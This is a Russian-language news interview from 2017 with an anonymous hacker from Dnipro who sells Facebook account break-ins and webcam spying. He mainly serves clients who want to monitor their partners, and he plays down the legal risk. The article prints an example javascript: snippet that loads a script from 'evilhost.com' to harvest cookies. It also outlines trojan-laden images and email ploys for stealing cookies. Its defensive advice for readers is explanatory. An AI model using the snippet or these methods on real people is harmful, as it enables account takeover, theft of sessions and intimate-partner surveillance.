Хакер из Днепра рассказал, какие фатальные ошибки делают люди в соцсетях

Фото из фотобанка

Обзоры
27 января 2017 10:53

Кто из нас не восхищался ими в кино? Смелые, чертовски умные парни, которые несмотря ни на что, могут обвести вокруг пальца абсолютно любого. Жизнь реальных хакеров сильно отличается от их прототипов на экране. Они умеют пользоваться "черным Google" и TOR, но не гнушаются заработком на взломе страничек в "Фейсбук". Герой этого материала пожелал остаться анонимным (что неудивительно), поэтому условно будем называть его Макс.

Макс – коренной днепрянин. В 2010-ом оставил работу в крупной IT-компании, когда понял, что на одном взломе социальных страниц можно зарабатывать не меньше и при этом быть хозяином своего времени. Парень рассказал Vgorode о том, что чаще всего просят взломать и сколько это стоит.

Хакер из Днепра рассказал, какие фатальные ошибки делают люди в соцсетях фото


Подключиться к камере и взломать чужую страницу легко


С какими заданиями к тебе чаще всего обращаются?

Обычно просят сделать доступ к чужой камере на ноуте или взломать страницу в "Фейсбук". Парадокс нашего времени высоких технологий в том, что защитить вас от слежки по "вебке" может только лейкопластырь на камере.

Подключиться к камере на вашем ноуте можно как с помощью специальных программ, так и вручную. Для этого нужно создать исполняемый файл и "заразить" им компьютер. Это можно сделать, например, через безобидную на первый взгляд jpg-картинку. Информацию, как это сделать можно найти даже на форумах. Правда, большинство людей не знает, где ее искать и ведется на псевдообучающие видеоролики на ютюбе. Там показывают абсолютный бред. По ІР-адресу взломать "вебку" нельзя. Чтобы уберечь себя от слежки, не открывайте вложения к письмам и сообщениям, которые приходят от незнакомцев. "Троян" - по-прежнему самый распространенный способ залезть в чужой компьютер.

Взламывать чужие страницы в "Фейсбуке" можно, если заставить жертву перейти на фейковую страницу. Например, вы предлагаете ей вставить в поисковую строку определенный скрипт (программа, написанная на одном из языков программирования). Большинство людей ничего и не заподозрят. Это можно сделать даже со страницы заказчика, который является парнем/девушкой "жертвы".

Подобный скрипт может выглядеть вот так: javascript:var sc=document.createElement(‘script’);sc.src=’http://evilhost.com/scripts/evilscript.js?nz=’+Math.random();document.body.appendChild(s);void(0);

Пользователю можно сказать, что, перейдя по ссылке, он скачает классную песню. А в это время злоумышленник сможет проанализировать его файлы cookies.

Поэтому не введитесь на подобное. А если уж вы сами хотите кого-то взломать, ни в коем случае не нажимайте на ссылки в Интернете, по которым обещают чудодейственную программу. С vk.com не прокатывают "брут форсы" (спец.программы для взлома) с использованием утилит жесткого перебора паролей. Уже после третьей неудачной попытки включается "капча".  

Хакер из Днепра рассказал, какие фатальные ошибки делают люди в соцсетях фото 1

Конечно, взлом влечет за собой уголовную ответственность, но еще не знаю никого, кто бы отлавливал хакеров за подобное. По сути, это мелочь на уровне государства. Никому нет до этого дела. Банки я не граблю.

Что нужно сделать, чтобы не попасть к взломщику на крючок?

Гарантий от взлома нет. Есть дельные советы: следите за адресом, на который переходите (если в адресной строке изменена хоть 1 буква – это наверняка ловушка), не открывайте непонятные файлы и не отвечайте на подозрительные письма. Пароли лучше выбирать  в виде бессмысленных наборов букв и цифр (не менее 8 знаков). Так вас не взломают "голыми руками". Есть специальные программы, которые генерируют всевозможные сочетания букв и цифр. Но если ими пользоваться, на взлом страницы уйдут годы.


Страницы взламывают для контроля вторых половинок


Сколько платят за взлом социальной страницы?

5-6 тысяч гривен. В месяц беру 2-3 заказа. Это стандартные расценки. Хотя если уже говорить откровенно, я не понимаю, зачем людям это нужно. Все хотят контролировать своих парней, девушек, жен, мужей… Но если человек активно с кем-то общается, это можно вычислить и без взломов. Разве нет? Кстати, последний год за подобной услугой обращается почти в два раза меньше людей. Наверное, кризис.

Хакер из Днепра рассказал, какие фатальные ошибки делают люди в соцсетях фото 2

Как клиенты тебя находят?

Через форумы. В Интернете их много. Тем, кто решил воспользоваться "помощью извне", стоит быть очень осторожными. Кидают на форумах на раз-два. Лучше общаться только на проверенных сайтах. Нередко это бывают ничем не примечательные форумы с заголовками вроде "Программа по географии за 8 класс", "Вышивка крестиком для малышей" и т.д. Когда открываете такой сайт, вам бросается в глаза до ужаса банальная переписка на заданную тему, но стоит открыть кэшированную версию страницу и можно прочесть много интересного. Нередко на таких форумах используют шифр, но без ключа все диалоги выглядят как обмен множеством бессмысленных фраз. Чтобы попасть на такой сайт, нужен кто-то свой.

Не жалеешь, что ушел с постоянной работы ради нелегальной подработки?

Нет. Когда работаешь на крупную компанию 5 дней в неделю с 9 до 9, то времени жить вообще нет. Ты просто один из нескольких десятков роботов, которые кодят на большого дядю. Вот фриланс – это другое. Сегодня множество ребят проходят короткие курсы на тех же тестировщиков и горя не знают. Хотя создается впечатление, что скоро тестировщиков будет больше, чем программистов.


"Черный интернет" – это ад, который никто не в силах остановить


Сегодня много говорят о "черном Интернете". Что это? Он существует?

Да, он настолько же реален, как и обычная сеть.  Параллельный Интернет не видят поисковые системы Яндекс, Google и др. Доступ к множеству сайтов возможен только через цепочку зашифрованных соединений – TOR-сеть, узлы которой раскиданы по всему миру. Все соединения анонимны, проложить новый маршрут можно в любой момент. Про TOR говорят, что она состоит на 99% из троллей, хакеров, любителей детского порно и агентов ФБР.

Изначально это было что-то вроде закрытой сети для военных, но потом его каким-то образом "слили" и TOR облюбовали торговцы оружием, работорговцы и извращенцы. На самом деле в голове не укладывается, что буквально в клике от привычной нам "мировой паутины" процветает "ад", и никто не в состоянии его реально остановить. На сегодня эта "преисподняя" работает в основном на английском, но и наши соотечественники туда наведываются. 

Хакер из Днепра рассказал, какие фатальные ошибки делают люди в соцсетях фото 3

Реальные хакеры похожи на тех ребят, что взламывают Пентагон в боевиках?

На экране хакеры больше бегают, чем реально кого-то взламывают. Если за тобой уже кто-то активно начал охоту, то скрыться, как фильмах, уже вряд ли получится. Это в представлении голливудских режиссеров у каждого хакера есть десяток друзей с автоматами и джипом, которые готовы умереть, лишь бы тебя не обидели. В реальной жизни играть с "большими дядями" опасно, гораздо безопаснее заниматься мелочью вроде взлома страниц в "Фейсбуке".

Кстати, о взломе Пентагона… СМИ любят писать о юных хакерах, взламывающих "такую серьезную систему". В результате оказывается, что юный гений всего лишь раздобыл список сотрудников Пентагона. Ребята, это может сделать любой с помощью поисковика, несмотря на то, что сайт защищен. По умолчанию слова и вообще любые введенные символы Google ищет по всем файлам на проиндексированных страницах. Ограничить область поиска можно по домену верхнего уровня, конкретному сайту или по месту расположения искомой последовательности в самих файлах. Вопрос всегда в том, представляют ли украденные данные хоть какую-то практическую ценность.

Какой совет дашь нашим читателям, чтобы избежать участи сайта Пентагона?

Поменьше выкладывайте личных данных. Я бы даже посоветовал не указывать семейное положение и возраст в соцсетях, не выгружать фото с любимыми. Также откажитесь от функции "указать местоположение" под фотографией. Конечно, это здорово, что вы поехали в Египет, но пока вы не дома, об этом знать никому не нужно.

Также лучше всего менять никнэймы на форумах и сайтах. К примеру, кто-то вычислит, что вы везде регистрируетесь под ником "любочка129", найдет форумы, где вы сидите и узнает, что вы недавно интересовались на каком-то портале, где дешевле купить угги. Достаточно написать вам на почту письмо от имени админа форума с просьбой ответить на какой-то безобидный вопрос ("Какие угги вас интересуют: серые или зеленые?") и получить ваши "куки" в ответе по имейлу. Таким образом, можно будет получить доступ  к вашему "ящику", а потом и к аккаунтам в соцсетях. В общем, береженого Бог бережет. 

Будьте в курсе последних новостей, подпишитесь на канал Vgorode в Telegram и на наши группы в Facebook.

Это чат – пиши и читай 👇
Ого! ты доскролил до нашего чатбота 😏
Теперь у тебя есть возможность настроить его под себя и узнавать важный контент первым, чтобы рассказывать друзьям
Только почта, только хардкор 🤘
Мы в соцсетях